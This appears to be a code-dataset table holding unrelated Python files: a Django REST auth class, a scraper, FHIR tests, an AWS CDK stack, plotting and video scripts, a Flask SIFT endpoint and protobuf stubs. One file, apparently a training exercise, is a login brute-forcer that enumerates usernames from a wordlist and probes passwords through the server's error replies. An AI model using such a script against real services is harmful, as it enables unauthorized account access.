text stringlengths 8 6.05M |
|---|
from rest_framework import authentication
class BasicAuthentication(authentication.BasicAuthentication):
    """HTTP Basic auth that accepts ``user@domain`` style usernames.

    The domain part is stripped before delegating to DRF's standard
    credential check, so only the bare userid is authenticated.
    """

    def authenticate_credentials(self, userid, password, request=None):
        if "@" in userid:
            # maxsplit=1: a userid containing several "@" characters would
            # otherwise raise ValueError on tuple unpacking. Everything
            # after the first "@" is treated as the (ignored) domain.
            # Debug print of credentials removed.
            userid, _domain = userid.split("@", 1)
        return super().authenticate_credentials(userid, password, request)
|
# Demonstrates that dict indexing returns a reference, not a copy:
# mutating the retrieved list mutates the dict's stored value in place.
d = {'key': [1, 2, 3]}
alias = d['key']
alias.append(1)
print(d)
import requests
from bs4 import BeautifulSoup
# Fetch the bus schedule/itinerary listing page and print, for each table
# cell, either the absolute link URL (anchor cells) or the cell's text.
url = 'http://servicos2.sjc.sp.gov.br/servicos/horario-e-itinerario.aspx?acao=p&opcao=1&txt='
request = requests.get(url)
soup = BeautifulSoup(request.text, 'lxml')
lista_all = soup.find_all('table', class_='textosm')
url = 'http://servicos2.sjc.sp.gov.br'  # base for building absolute links
for table in lista_all:
    for cell in table.find_all('td'):
        first = cell.next_element
        if first.name == 'a':
            # Anchor cell: combine the site base with the relative href.
            print(f"{url}{first.get('href')}")
        else:
            print(first)
import pytest
import pdb
from fhireval.test_suite.crud import prep_server
# Human-readable identifier for this CRUD test group (padded for report alignment).
test_id = f"{'2.2.11':<10} - CRUD Document Reference"
# Relative weight of this suite in the overall evaluation score.
test_weight = 2
# Cache the DocumentReference ID created by the CREATE test so the later
# read/update/patch/delete tests can target the same record.
example_document_ref_id = None
def test_create_research_document_ref(host, prep_server):
    """CREATE: post a Patient, then a DocumentReference that references it."""
    global example_document_ref_id

    patient = prep_server['CMG-Examples']['Patient'][0]
    patient_response = host.post('Patient', patient, validate_only=False)
    patient_id = patient_response['response']['id']

    doc_ref = prep_server['Common-Examples']['DocumentReference'][0]
    doc_ref['subject']['reference'] = f"Patient/{patient_id}"

    create_response = host.post('DocumentReference', doc_ref, validate_only=False)
    assert create_response['status_code'] == 201, 'CREATE success'
    # Remember the server-assigned ID for the rest of the CRUD suite.
    example_document_ref_id = create_response['response']['id']
def test_read_research_document_ref(host, prep_server):
    """READ: fetch the created DocumentReference and spot-check its fields."""
    expected = prep_server['Common-Examples']['DocumentReference'][0]
    entries = host.get(f"DocumentReference/{example_document_ref_id}").entries
    assert len(entries) == 1, "READ Success and only one was found"
    found = entries[0]
    # Just make sure we got what we expected
    assert expected['status'] == found['status'], 'Verify Identifier matches'
    assert expected['content'][0]['attachment']['url'] == found['content'][0]['attachment']['url']
def test_update_research_document_ref(host, prep_server):
    """UPDATE: change the attachment URL and verify it persisted."""
    import copy  # local import: deep copy needed below

    example_document_ref = prep_server['Common-Examples']['DocumentReference'][0]
    # BUG FIX: the original used a shallow .copy(), which shares the nested
    # 'content' dicts — editing the attachment URL through the copy also
    # corrupted the fixture data used by the other tests in this module.
    altered_document_ref = copy.deepcopy(example_document_ref)
    altered_document_ref['content'][0]['attachment']['url'] = 'drs:example.com/12/23/45'
    altered_document_ref['id'] = example_document_ref_id
    result = host.update('DocumentReference', example_document_ref_id, altered_document_ref)
    assert result['status_code'] == 200
    document_ref_qry = host.get(f"DocumentReference/{example_document_ref_id}").entries
    assert len(document_ref_qry) == 1, "READ success and only one was found"
    assert document_ref_qry[0]['content'][0]['attachment']['url'] == 'drs:example.com/12/23/45'
def test_patch_research_document_ref(host, prep_server):
    """PATCH: flip the status to 'superseded' via JSON Patch and verify.

    The unused fixture lookup present in the original was removed.
    """
    patch_ops = [{"op": "replace", "path": "/status", "value": "superseded"}]
    result = host.patch('DocumentReference', example_document_ref_id, patch_ops)
    assert result['status_code'] == 200
    document_ref_qry = result['response']
    assert document_ref_qry['status'] == 'superseded'
def test_delete_research_document_ref(host, prep_server):
    """DELETE: remove the DocumentReference created earlier by its ID.

    The unused fixture lookup and the needless ``global`` declaration
    (the module-level ID is only read here) were removed.
    """
    delete_result = host.delete_by_record_id('DocumentReference', example_document_ref_id)
    assert delete_result['status_code'] == 200
|
#!/usr/bin/env python3
import base64
from aws_cdk import (
aws_autoscaling as autoscaling,
aws_ec2 as ec2,
aws_elasticloadbalancingv2 as elbv2,
core,
)
"""
https://cloudacademy.com/blog/elastic-load-balancers-ec2-auto-scaling-to-support-aws-workloads/
"""
class LoadBalancerStack(core.Stack):
    """Provision a VPC, an auto-scaling group of web servers, and an
    internet-facing application load balancer in front of them.

    https://cloudacademy.com/blog/elastic-load-balancers-ec2-auto-scaling-to-support-aws-workloads/
    """

    def __init__(self, app: core.App, id: str, **kwargs) -> None:
        super().__init__(app, id, **kwargs)
        env_name = self.node.try_get_context('env')
        vpc = ec2.Vpc(self, id=f"{env_name}VPC")
        # Read the instance bootstrap script. The context manager closes the
        # file handle (the original `open(...).read()` leaked it).
        with open("./pr_stacks/httpd.sh", "rb") as script:
            data = script.read()
        httpd = ec2.UserData.for_linux()
        httpd.add_commands(data.decode('utf-8'))
        asg = autoscaling.AutoScalingGroup(
            self,
            id=f"{env_name}-ASG",
            vpc=vpc,
            instance_type=ec2.InstanceType.of(
                ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO
            ),
            machine_image=ec2.AmazonLinuxImage(generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2),
            user_data=httpd,
            min_capacity=2,
            max_capacity=5
        )
        lb = elbv2.ApplicationLoadBalancer(
            self, "LB",
            vpc=vpc,
            internet_facing=True)
        """
        Listeners: For every load balancer, regardless of the type used,
        you must configure at least one listener. The listener defines how your
        inbound connections are routed to your target groups based on ports
        and protocols set as conditions. The configurations of the listener
        itself differ slightly depending on which ELB you have selected.
        """
        listener = lb.add_listener(id=f"{env_name}-Listener", port=80)
        """
        Target Groups: A target group is simply a group of your resources that
        you want your ELB to route requests to, such as a fleet of EC2 instances.
        You can configure the ELB with a number of different target groups, each
        associated with a different listener configuration and associated rules.
        This enables you to route traffic to different resources based upon the
        type of request.
        """
        listener.add_targets(id=f"{env_name}-Target", port=80, targets=[asg])
        listener.connections.allow_default_port_from_any_ipv4(description="Open to the world")
        # Scale out when sustained request rate exceeds 1 req/s per instance.
        asg.scale_on_request_count(id=f"{env_name}-AModestLoad", target_requests_per_second=1)
        core.CfnOutput(self, "LoadBalancer", export_name="LoadBalancer", value=f"http://{lb.load_balancer_dns_name}")
|
import unittest
from fibonacciLists import nth_fib_lists
class TestsFibonacciLists(unittest.TestCase):
    """Unit tests for nth_fib_lists (element-wise Fibonacci over lists)."""

    def test_nth_fib_lists_first(self):
        """n=1 returns the first seed list."""
        self.assertEqual(nth_fib_lists([1], [2], 1), [1])

    def test_nth_fib_lists_second(self):
        """n=2 returns the second seed list."""
        self.assertEqual(nth_fib_lists([1], [2], 2), [2])

    def test_nth_fib_lists_empty_lists(self):
        """Empty seed lists yield an empty result regardless of n."""
        self.assertEqual(nth_fib_lists([], [], 59), [])

    def test_nth_fib_lists_correct(self):
        """A later term combines the seeds element-wise as expected."""
        self.assertEqual(nth_fib_lists([], [1, 2, 3], 4), [1, 2, 3, 1, 2, 3])
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
import sys
import socket
import itertools
import json
import string
# Target server address comes from the command line: host port.
host = sys.argv[1]
port = int(sys.argv[2])
# Load the candidate logins; the context manager closes the file (the
# original leaked the handle and wrapped readlines() in a redundant list()).
with open("F:/code/Password Hacker/Password Hacker/task/hacking/logins.txt") as logins_file:
    common_logins = [login.rstrip() for login in logins_file]
# Alphabet used for the per-character password probe.
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
client_socket = socket.socket()
address = (host, port)
client_socket.connect(address)
def get_login():
    """Probe the server with each candidate login and a blank password.

    The server answers ``{"result": "Wrong password!"}`` only for an
    existing login, so that reply identifies a valid account name.

    Returns the discovered login, or None if no candidate matched or a
    network/JSON error occurred.
    """
    print("finding login...")
    try:
        for login in common_logins:
            data = json.dumps({
                "login": login,
                "password": " "
            })
            client_socket.send(data.encode())
            response = json.loads(client_socket.recv(
                1024).decode(encoding='utf-8'))
            if response == {"result": "Wrong password!"}:
                print("login is: " + login)
                return login
    except Exception as exc:
        # Report what actually went wrong instead of swallowing the detail.
        print(f"Exception occurred: {exc}")
    return None
def get_password(login):
    """Send each single character as the password for *login*; print any
    character the server flags with its 'exception' response."""
    print("finding password...")
    for ch in characters:
        try:
            payload = json.dumps({
                "login": login,
                "password": ch
            })
            client_socket.send(payload.encode())
            reply = json.loads(client_socket.recv(
                1024).decode(encoding='utf-8'))
            if reply.get('result') == 'Exception happened during login':
                print("first character is: " + ch)
        except Exception as e:
            print(e)
# Drive the attack: recover the login first, then probe password characters,
# and close the shared socket when done.
user_login = get_login()
get_password(user_login)
client_socket.close()
|
import csv
import matplotlib.pyplot as plt
from statistics import mean
import numpy as np
def count_lap():
    """Load per-round cluster data from the experiment CSV files.

    For each threshold t in 0.1 .. 0.9 two files are read:
    ``data cluster fix<t>.csv`` and ``data cluster dynamic <t>.csv``.
    Each CSV row contributes its first two columns, converted to floats.
    Every series is then sorted and terminated with an ``['', '', '']``
    sentinel row so the group-averaging functions below can detect the
    final group boundary.

    Returns a 19-tuple: an (always empty, kept for interface
    compatibility) list, the nine fixed-t series, then the nine
    dynamic-t series.  The original 9-way if/elif duplication is replaced
    by direct indexing; behavior is unchanged.
    """
    fixed = [[] for _ in range(9)]
    dynamic = [[] for _ in range(9)]
    for i in range(1, 10):
        t = i / 10  # str(t) renders as '0.1' .. '0.9', matching the filenames
        with open('data cluster fix' + str(t) + '.csv', 'r') as csvnew:
            for line in csv.reader(csvnew):
                fixed[i - 1].append(list(map(float, line[0:2])))
        with open('data cluster dynamic ' + str(t) + '.csv', 'r') as csvnew:
            for line in csv.reader(csvnew):
                dynamic[i - 1].append(list(map(float, line[0:2])))
    for series in fixed + dynamic:
        series.sort()
        # Sentinel row: marks the end of the last group for the averagers.
        series.append(['', '', ''])
    return ([], *fixed, *dynamic)
def _avg_fix_groups(rows):
    """Average column 1 over runs of equal column-0 values in *rows*.

    *rows* is sorted and terminated by an ``['', '', '']`` sentinel.
    This mirrors the original accumulation exactly: within a run of n
    equal keys only the first n-1 rows are summed/counted, and a
    single-row group contributes nothing.
    """
    count, total, averages = 0, 0, []
    for idx in range(len(rows) - 1):
        if rows[idx][0] == rows[idx + 1][0]:
            count += 1
            total += rows[idx][1]
        elif count != 0:  # key changed: flush the accumulated group
            averages.append(total / count)
            count, total = 0, 0
    return averages


# The nine dfix_* functions had identical bodies; each now delegates to
# the shared helper.  Names and signatures are unchanged for callers.

def dfix_1(count_1):
    """Per-group averages for the fixed t=0.1 series."""
    return _avg_fix_groups(count_1)


def dfix_2(count_2):
    """Per-group averages for the fixed t=0.2 series."""
    return _avg_fix_groups(count_2)


def dfix_3(count_3):
    """Per-group averages for the fixed t=0.3 series."""
    return _avg_fix_groups(count_3)


def dfix_4(count_4):
    """Per-group averages for the fixed t=0.4 series."""
    return _avg_fix_groups(count_4)


def dfix_5(count_5):
    """Per-group averages for the fixed t=0.5 series."""
    return _avg_fix_groups(count_5)


def dfix_6(count_6):
    """Per-group averages for the fixed t=0.6 series."""
    return _avg_fix_groups(count_6)


def dfix_7(count_7):
    """Per-group averages for the fixed t=0.7 series."""
    return _avg_fix_groups(count_7)


def dfix_8(count_8):
    """Per-group averages for the fixed t=0.8 series."""
    return _avg_fix_groups(count_8)


def dfix_9(count_9):
    """Per-group averages for the fixed t=0.9 series."""
    return _avg_fix_groups(count_9)
def _avg_dyn_groups(rows):
    """Average column 1 over runs of equal column-0 values in *rows*.

    *rows* is sorted and terminated by an ``['', '', '']`` sentinel.
    Mirrors the original accumulation exactly: within a run of n equal
    keys only the first n-1 rows are summed/counted, and a single-row
    group contributes nothing.
    """
    count, total, averages = 0, 0, []
    for idx in range(len(rows) - 1):
        if rows[idx][0] == rows[idx + 1][0]:
            count += 1
            total += rows[idx][1]
        elif count != 0:  # key changed: flush the accumulated group
            averages.append(total / count)
            count, total = 0, 0
    return averages


# The nine dynamic_* functions had identical bodies; each now delegates
# to the shared helper.  Names and signatures are unchanged for callers.

def dynamic_1(dyn_1):
    """Per-group averages for the dynamic t=0.1 series."""
    return _avg_dyn_groups(dyn_1)


def dynamic_2(dyn_2):
    """Per-group averages for the dynamic t=0.2 series."""
    return _avg_dyn_groups(dyn_2)


def dynamic_3(dyn_3):
    """Per-group averages for the dynamic t=0.3 series."""
    return _avg_dyn_groups(dyn_3)


def dynamic_4(dyn_4):
    """Per-group averages for the dynamic t=0.4 series."""
    return _avg_dyn_groups(dyn_4)


def dynamic_5(dyn_5):
    """Per-group averages for the dynamic t=0.5 series."""
    return _avg_dyn_groups(dyn_5)


def dynamic_6(dyn_6):
    """Per-group averages for the dynamic t=0.6 series."""
    return _avg_dyn_groups(dyn_6)


def dynamic_7(dyn_7):
    """Per-group averages for the dynamic t=0.7 series."""
    return _avg_dyn_groups(dyn_7)


def dynamic_8(dyn_8):
    """Per-group averages for the dynamic t=0.8 series."""
    return _avg_dyn_groups(dyn_8)


def dynamic_9(dyn_9):
    """Per-group averages for the dynamic t=0.9 series."""
    return _avg_dyn_groups(dyn_9)
def plot(avg_rfix1, avg_rfix2, avg_rfix3, avg_rfix4, avg_rfix5,
         avg_rfix6, avg_rfix7, avg_rfix8, avg_rfix9,
         avg_dyn1, avg_dyn2, avg_dyn3, avg_dyn4, avg_dyn5,
         avg_dyn6, avg_dyn7, avg_dyn8, avg_dyn9):
    """Plot cluster counts per round.

    Shows a line chart of the nine fixed-t series, then a grouped bar
    chart of max / mean / min per series for all 18 series (fixed then
    dynamic).

    NOTE(review): the original also built an unused ``first_round`` list
    that read ``avg_dyn8[0]`` twice where ``avg_dyn9[0]`` was clearly
    intended; the dead (and buggy) computation and the large blocks of
    commented-out alternative plots were removed.
    """
    fixed_series = [avg_rfix1, avg_rfix2, avg_rfix3, avg_rfix4, avg_rfix5,
                    avg_rfix6, avg_rfix7, avg_rfix8, avg_rfix9]
    dyn_series = [avg_dyn1, avg_dyn2, avg_dyn3, avg_dyn4, avg_dyn5,
                  avg_dyn6, avg_dyn7, avg_dyn8, avg_dyn9]

    # Line chart: one curve per fixed-t series (labels match the original).
    for k, series in enumerate(fixed_series, start=1):
        plt.plot(series, label=' fix t predefine at 0.' + str(k))
    plt.xlabel('round')
    plt.ylabel('number of cluster')
    plt.title("number of cluster in difference t_predefine value")
    plt.legend()
    plt.show()

    # Grouped bar chart: max / mean / min per series, fixed then dynamic.
    all_series = fixed_series + dyn_series
    width = 0.25
    ind = np.arange(len(all_series))  # 18 groups of three bars
    max_round = [max(s) for s in all_series]
    min_round = [min(s) for s in all_series]
    mean_round = [mean(s) for s in all_series]
    bar_max = plt.bar(ind, max_round, width, label=' maximum round')
    bar_mean = plt.bar(ind + width, mean_round, width, label=' average round')
    bar_min = plt.bar(ind + width + width, min_round, width, label=' minimum round')
    labels = tuple('fix 0.%d' % k for k in range(1, 10)) + \
        tuple('dyn 0.%d' % k for k in range(1, 10))
    plt.xticks(ind + width, labels)
    # Annotate each bar with its (integer-truncated) height.
    for rect in bar_max + bar_mean + bar_min:
        height = rect.get_height()
        plt.text(rect.get_x() + rect.get_width() / 2.0, height,
                 '%d' % int(height), ha='center', va='bottom')
    plt.xlabel('')
    plt.ylabel('number of cluster')
    plt.title("number of cluster in difference t_predefine value")
    plt.ylim(0, 15)
    plt.tight_layout()
    plt.legend()
    plt.show()
def run():
    """Load the CSV data, compute per-group averages, and plot everything."""
    count, count_1, count_2, count_3, count_4, count_5, count_6, count_7, count_8, count_9,\
        dyn_1, dyn_2, dyn_3, dyn_4, dyn_5, dyn_6, dyn_7, dyn_8, dyn_9 = count_lap()
    avg_rfix1 = dfix_1(count_1)
    avg_rfix2 = dfix_2(count_2)
    avg_rfix3 = dfix_3(count_3)
    avg_rfix4 = dfix_4(count_4)
    avg_rfix5 = dfix_5(count_5)
    avg_rfix6 = dfix_6(count_6)
    avg_rfix7 = dfix_7(count_7)
    avg_rfix8 = dfix_8(count_8)
    avg_rfix9 = dfix_9(count_9)
    avg_dyn1 = dynamic_1(dyn_1)
    avg_dyn2 = dynamic_2(dyn_2)
    avg_dyn3 = dynamic_3(dyn_3)
    avg_dyn4 = dynamic_4(dyn_4)
    avg_dyn5 = dynamic_5(dyn_5)
    avg_dyn6 = dynamic_6(dyn_6)
    avg_dyn7 = dynamic_7(dyn_7)
    avg_dyn8 = dynamic_8(dyn_8)
    avg_dyn9 = dynamic_9(dyn_9)
    # BUG FIX: the original passed avg_rfix3 twice and never avg_rfix2.
    plot(avg_rfix1, avg_rfix2, avg_rfix3, avg_rfix4, avg_rfix5,
         avg_rfix6, avg_rfix7, avg_rfix8, avg_rfix9,
         avg_dyn1, avg_dyn2, avg_dyn3, avg_dyn4, avg_dyn5,
         avg_dyn6, avg_dyn7, avg_dyn8, avg_dyn9)


if __name__ == '__main__':
    # Guarded so importing this module no longer triggers file I/O/plots.
    run()
|
import cv2
from numpy import *
import os
# Build an MP4V-encoded video from every .jpg in the source directory.
path = "/Users/myazdaniUCSD/Documents/Ten_Thousand_Pairs/found_pairs_source/"
write_path = '/Users/myazdaniUCSD/Documents/Ten_Thousand_Pairs/videos/'
image_paths = [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.jpg')]
codec = cv2.cv.CV_FOURCC('m', 'p', '4', 'v')
size = (184 * 5, 45 * 5)  # output frame size (width, height); frames are resized to this
fps = 7
videoWriter = cv2.VideoWriter(write_path + 'EyePair_instagram_expanded_inter_lanczos4.mov', codec, fps, size, 1)
for image_path in image_paths:
    img = cv2.imread(image_path)
    if img is None:
        # Unreadable/corrupt image: skip it instead of crashing in resize().
        continue
    resized = cv2.resize(img, size, interpolation=cv2.INTER_LANCZOS4)
    videoWriter.write(resized)
# Finalize the container; without release() the output file may be truncated.
videoWriter.release()
|
#!/usr/bin/env python3
import os, subprocess, shutil, re
from flask import request, Blueprint, current_app as app, abort
from werkzeug.utils import secure_filename
from .handle_keypoints import handle_keypoints
# Flask blueprint exposing the /execute endpoint defined below.
execute = Blueprint('execute', __name__)
@execute.route('/execute', methods=['GET'])
def sift_cli():
    """Run the SIFT CLI demo on the requested image and return its keypoints.

    Query-string parameters are forwarded to ``sift_cli`` as command-line
    options; the resulting keypoints are converted to Lowe's format via
    ``anatomy2lowe`` and handed to handle_keypoints().  Stderr output from
    either binary is returned to the client as-is.
    """
    # ---Arrange---
    inputImagePath = app.config["ASSETS_FOLDER"] + '/' + request.args.get('inputImageName')
    ss_noct = request.args.get('ss_noct')
    ss_nspo = request.args.get('ss_nspo')
    ss_dmin = request.args.get('ss_dmin')
    ss_smin = request.args.get('ss_smin')
    ss_sin = request.args.get('ss_sin')
    thresh_dog = request.args.get('thresh_dog')
    thresh_edge = request.args.get('thresh_edge')
    ori_nbins = request.args.get('ori_nbins')
    ori_thresh = request.args.get('ori_thresh')
    ori_lambda = request.args.get('ori_lambda')
    descr_nhist = request.args.get('descr_nhist')
    descr_nori = request.args.get('descr_nori')
    descr_lambda = request.args.get('descr_lambda')
    verb_keys = request.args.get('verb_keys')
    verb_ss = request.args.get('verb_ss')
    sift_cli_params = \
        [
            "./demo_SIFT/bin/sift_cli", inputImagePath,  # algorithm executable and input picture
            "-ss_noct", ss_noct,          # number of octaves
            "-ss_nspo", ss_nspo,          # number of scales per octave
            "-ss_dmin", ss_dmin,          # the sampling distance in the first octave
            "-ss_smin", ss_smin,          # blur level on the seed image
            "-ss_sin", ss_sin,            # assumed level of blur in the input image
            "-thresh_dog", thresh_dog,    # threshold over the DoG response
            "-thresh_edge", thresh_edge,  # threshold over the ratio of principal curvature
            "-ori_nbins", ori_nbins,      # number of bins in the orientation histogram
            "-ori_thresh", ori_thresh,    # threshold for considering local maxima in the orientation histogram
            "-ori_lambda", ori_lambda,    # sets how local is the analysis of the gradient distribution
            "-descr_nhist", descr_nhist,  # number of histograms per dimension
            "-descr_nori", descr_nori,    # number of bins in each histogram
            "-descr_lambda", descr_lambda,  # sets how local the descriptor is
        ]
    # Reset the output directories; failures are returned (not raised) by the
    # helper and are intentionally ignored here, matching the original flow.
    check_output_directory()
    if verb_keys == "1":
        sift_cli_params.extend(["-verb_keys", verb_keys])  # output the intermediary sets of keypoints
    if verb_ss == "1":
        # BUG FIX: the original appended verb_keys as the value here.
        sift_cli_params.extend(["-verb_ss", verb_ss])  # output the scalespaces (Gaussian and DoG)
    # ---Act---
    process = subprocess.Popen(sift_cli_params, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    if stderr.decode("utf-8") != '':
        return stderr
    elif stdout.decode("utf-8") != '':
        features_string = stdout.decode("utf-8")
        # Context managers ensure the keypoint files are flushed and closed.
        with open("static/keypoints/features.txt", "a") as feature_file:
            feature_file.write(features_string)
        process = subprocess.Popen(
            ["./demo_SIFT/bin/anatomy2lowe", "static/keypoints/features.txt"],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        if stderr.decode("utf-8") != '':
            return stderr
        elif stdout.decode("utf-8") != '':
            features2lowe_string = stdout.decode("utf-8")
            with open("static/keypoints/features2lowe.txt", "a") as lowe_file:
                lowe_file.write(stdout.decode("utf-8"))
            return handle_keypoints(features2lowe_string, inputImagePath)
        abort(400, "Can't convert keypoints by execute features2lowe")
    else:
        return handle_keypoints("", inputImagePath)
def check_output_directory():
    """Wipe and recreate the scalespace/dog/keypoints output folders.

    Returns None on success; on failure returns the exception object
    (callers may ignore it).
    """
    output_dirs = ('static/scalespace', 'static/dog', 'static/keypoints')
    try:
        # Remove all three first, then recreate them, as in the original.
        for directory in output_dirs:
            shutil.rmtree(directory, ignore_errors=True, onerror=None)
        for directory in output_dirs:
            os.makedirs(directory)
    except Exception as e:
        return e
|
# @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,
FileDescriptor as google___protobuf___descriptor___FileDescriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from opentelemetry.proto.common.v1.common_pb2 import (
AttributeKeyValue as opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue,
InstrumentationLibrary as opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary,
)
from opentelemetry.proto.resource.v1.resource_pb2 import (
Resource as opentelemetry___proto___resource___v1___resource_pb2___Resource,
)
from typing import (
Iterable as typing___Iterable,
List as typing___List,
NewType as typing___NewType,
Optional as typing___Optional,
Text as typing___Text,
Tuple as typing___Tuple,
Union as typing___Union,
cast as typing___cast,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
# Aliases that preserve access to the real builtins: generated message
# attributes may shadow names such as ``bool`` or ``bytes``.
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
builtin___str = str
if sys.version_info < (3,):
    # Python 2 only: buffer/unicode do not exist on Python 3.
    builtin___buffer = buffer
    builtin___unicode = unicode
# Generated file-level protobuf descriptor.
DESCRIPTOR: google___protobuf___descriptor___FileDescriptor = ...
# NOTE(review): generated mypy stub ("Do not edit!" per file header) —
# comments only; regenerate rather than hand-edit the declarations.
class ResourceSpans(google___protobuf___message___Message):
    # Message with one Resource and its spans grouped per instrumentation library.
    DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    @property
    def resource(self) -> opentelemetry___proto___resource___v1___resource_pb2___Resource: ...
    @property
    def instrumentation_library_spans(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___InstrumentationLibrarySpans]: ...
    def __init__(self,
        *,
        resource : typing___Optional[opentelemetry___proto___resource___v1___resource_pb2___Resource] = None,
        instrumentation_library_spans : typing___Optional[typing___Iterable[type___InstrumentationLibrarySpans]] = None,
        ) -> None: ...
    if sys.version_info >= (3,):
        @classmethod
        def FromString(cls, s: builtin___bytes) -> ResourceSpans: ...
    else:
        @classmethod
        def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> ResourceSpans: ...
    def HasField(self, field_name: typing_extensions___Literal[u"resource",b"resource"]) -> builtin___bool: ...
    def ClearField(self, field_name: typing_extensions___Literal[u"instrumentation_library_spans",b"instrumentation_library_spans",u"resource",b"resource"]) -> None: ...
type___ResourceSpans = ResourceSpans
# NOTE(review): generated mypy stub ("Do not edit!" per file header) —
# comments only; regenerate rather than hand-edit the declarations.
class InstrumentationLibrarySpans(google___protobuf___message___Message):
    # Message pairing one InstrumentationLibrary with its Span collection.
    DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    @property
    def instrumentation_library(self) -> opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary: ...
    @property
    def spans(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span]: ...
    def __init__(self,
        *,
        instrumentation_library : typing___Optional[opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary] = None,
        spans : typing___Optional[typing___Iterable[type___Span]] = None,
        ) -> None: ...
    if sys.version_info >= (3,):
        @classmethod
        def FromString(cls, s: builtin___bytes) -> InstrumentationLibrarySpans: ...
    else:
        @classmethod
        def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> InstrumentationLibrarySpans: ...
    def HasField(self, field_name: typing_extensions___Literal[u"instrumentation_library",b"instrumentation_library"]) -> builtin___bool: ...
    def ClearField(self, field_name: typing_extensions___Literal[u"instrumentation_library",b"instrumentation_library",u"spans",b"spans"]) -> None: ...
type___InstrumentationLibrarySpans = InstrumentationLibrarySpans
class Span(google___protobuf___message___Message):
    """Stub for the OpenTelemetry Span message (trace ids, kind, timing,
    attributes, events, links and status)."""
    DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    SpanKindValue = typing___NewType('SpanKindValue', builtin___int)
    type___SpanKindValue = SpanKindValue
    class SpanKind(object):
        """Enum wrapper for the span kind (client/server/producer/consumer/internal)."""
        DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...
        @classmethod
        def Name(cls, number: builtin___int) -> builtin___str: ...
        @classmethod
        def Value(cls, name: builtin___str) -> Span.SpanKindValue: ...
        @classmethod
        def keys(cls) -> typing___List[builtin___str]: ...
        @classmethod
        def values(cls) -> typing___List[Span.SpanKindValue]: ...
        @classmethod
        def items(cls) -> typing___List[typing___Tuple[builtin___str, Span.SpanKindValue]]: ...
        SPAN_KIND_UNSPECIFIED = typing___cast(Span.SpanKindValue, 0)
        INTERNAL = typing___cast(Span.SpanKindValue, 1)
        SERVER = typing___cast(Span.SpanKindValue, 2)
        CLIENT = typing___cast(Span.SpanKindValue, 3)
        PRODUCER = typing___cast(Span.SpanKindValue, 4)
        CONSUMER = typing___cast(Span.SpanKindValue, 5)
    # The enum values are re-exported at the message level as well
    # (standard protobuf-stub convention, not an accidental duplicate).
    SPAN_KIND_UNSPECIFIED = typing___cast(Span.SpanKindValue, 0)
    INTERNAL = typing___cast(Span.SpanKindValue, 1)
    SERVER = typing___cast(Span.SpanKindValue, 2)
    CLIENT = typing___cast(Span.SpanKindValue, 3)
    PRODUCER = typing___cast(Span.SpanKindValue, 4)
    CONSUMER = typing___cast(Span.SpanKindValue, 5)
    type___SpanKind = SpanKind
    class Event(google___protobuf___message___Message):
        """Stub: a timestamped, named event attached to a span."""
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        time_unix_nano: builtin___int = ...
        name: typing___Text = ...
        dropped_attributes_count: builtin___int = ...
        @property
        def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
        def __init__(self,
            *,
            time_unix_nano : typing___Optional[builtin___int] = None,
            name : typing___Optional[typing___Text] = None,
            attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
            dropped_attributes_count : typing___Optional[builtin___int] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> Span.Event: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span.Event: ...
        def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"name",b"name",u"time_unix_nano",b"time_unix_nano"]) -> None: ...
    type___Event = Event
    class Link(google___protobuf___message___Message):
        """Stub: a reference from this span to another span (by trace/span id)."""
        DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
        trace_id: builtin___bytes = ...
        span_id: builtin___bytes = ...
        trace_state: typing___Text = ...
        dropped_attributes_count: builtin___int = ...
        @property
        def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
        def __init__(self,
            *,
            trace_id : typing___Optional[builtin___bytes] = None,
            span_id : typing___Optional[builtin___bytes] = None,
            trace_state : typing___Optional[typing___Text] = None,
            attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
            dropped_attributes_count : typing___Optional[builtin___int] = None,
            ) -> None: ...
        if sys.version_info >= (3,):
            @classmethod
            def FromString(cls, s: builtin___bytes) -> Span.Link: ...
        else:
            @classmethod
            def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span.Link: ...
